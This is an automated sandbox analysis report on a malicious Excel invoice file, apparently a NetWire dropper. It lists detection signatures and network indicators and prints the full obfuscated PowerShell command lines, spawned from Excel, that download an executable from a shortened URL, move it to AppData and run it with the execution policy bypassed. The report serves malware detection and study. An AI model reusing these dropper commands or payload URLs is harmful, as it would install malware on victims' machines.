Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Proforma Invoice.xls

Overview

General Information

Sample Name:Proforma Invoice.xls
Analysis ID:320373
MD5:55db711144ff4a35faf58d982e7cf727
SHA1:ea7b59dde9f0600915069dec66f8410f25cb66fd
SHA256:6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
Tags:netwirexls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Bypasses PowerShell execution policy
Document contains an embedded VBA macro which may execute processes
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1916 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 1748 cmdline: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2304 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1960 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2744 cmdline: powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1520 cmdline: cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2720 cmdline: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1916, ProcessCommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), ProcessId: 1748

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://shopphongtinh.com/Ubnccbruoun7.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: Proforma Invoice.xlsVirustotal: Detection: 14%Perma Link
Source: Proforma Invoice.xlsReversingLabs: Detection: 20%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: global trafficDNS query: name: cutt.ly
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443
Source: Joe Sandbox ViewIP Address: 104.22.0.232 104.22.0.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000007.00000002.2124228123.000000001B7B0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000003.2109437807.000000001D12F000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000007.00000003.2109437807.000000001D12F000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
Source: powershell.exe, 00000007.00000002.2125080589.000000001D0D4000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000007.00000002.2125115784.000000001D11C000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACerti
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
Source: powershell.exe, 00000007.00000002.2114304203.0000000000198000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2125107119.000000001D105000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2109437807.000000001D12F000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D
Source: powershell.exe, 00000007.00000003.2109034126.000000001B87E000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000007.00000002.2124228123.000000001B7B0000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab3
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000007.00000002.2124858803.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000007.00000002.2124858803.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000007.00000003.2109444945.000000001D10A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 00000007.00000002.2115822325.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2150939891.0000000002390000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2125198835.000000001D2B0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000007.00000002.2124858803.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://status.rapidssl.com0
Source: powershell.exe, 00000007.00000002.2124858803.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000007.00000002.2115822325.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2150939891.0000000002390000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000007.00000002.2125064377.000000001D0B0000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000007.00000002.2125064377.000000001D0B0000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000007.00000003.2109348918.000000001B899000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000007.00000002.2124523308.000000001B881000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000007.00000003.2109358154.000000001D0D0000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
Source: powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: powershell.exe, 00000007.00000002.2124553367.000000001B89D000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: powershell.exe, 00000007.00000002.2114281314.000000000015F000.00000004.00000020.sdmpString found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000007.00000002.2124858803.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000007.00000002.2121772795.00000000037F5000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com
Source: powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000007.00000002.2114281314.000000000015F000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2114281314.000000000015F000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000007.00000002.2125080589.000000001D0D4000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: powershell.exe, 00000007.00000003.2109444945.000000001D10A000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
Source: powershell.exe, 00000007.00000003.2109444945.000000001D10A000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000007.00000002.2125074123.000000001D0C5000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: powershell.exe, 00000007.00000003.2109437807.000000001D12F000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: powershell.exe, 00000007.00000002.2125064377.000000001D0B0000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: powershell.exe, 00000007.00000003.2109437807.000000001D12F000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: powershell.exe, 00000007.00000003.2109437807.000000001D12F000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
Source: powershell.exe, 00000007.00000003.2109399839.000000001D0DA000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000007.00000002.2125074123.000000001D0C5000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000007.00000003.2109387662.000000001D101000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.
Source: powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.1
Source: powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000007.00000002.2121772795.00000000037F5000.00000004.00000001.sdmpString found in binary or memory: https://cutt.l
Source: powershell.exe, 00000007.00000002.2121376094.00000000036CE000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly
Source: powershell.exe, 00000007.00000002.2121376094.00000000036CE000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/
Source: powershell.exe, 00000007.00000002.2121772795.00000000037F5000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2119937468.0000000002D53000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/ZhqUH1O
Source: powershell.exe, 00000007.00000002.2121376094.00000000036CE000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/ZhqUH1OPE
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000007.00000003.2109451228.000000001D0C4000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: powershell.exe, 00000007.00000002.2121471962.00000000037DA000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000007.00000002.2121471962.00000000037DA000.00000004.00000001.sdmpString found in binary or memory: https://shopphongtinh.com
Source: powershell.exe, 00000007.00000002.2121471962.00000000037DA000.00000004.00000001.sdmpString found in binary or memory: https://shopphongtinh.com/Ubnccbruoun7.exe
Source: powershell.exe, 00000007.00000002.2121772795.00000000037F5000.00000004.00000001.sdmpString found in binary or memory: https://shopphongtinh.comp
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000007.00000003.2109332633.000000001D115000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
Source: powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: powershell.exe, 00000007.00000002.2124276334.000000001B7CB000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000007.00000002.2124408720.000000001B816000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000007.00000002.2121471962.00000000037DA000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
Source: powershell.exe, 00000007.00000002.2124527603.000000001B888000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.
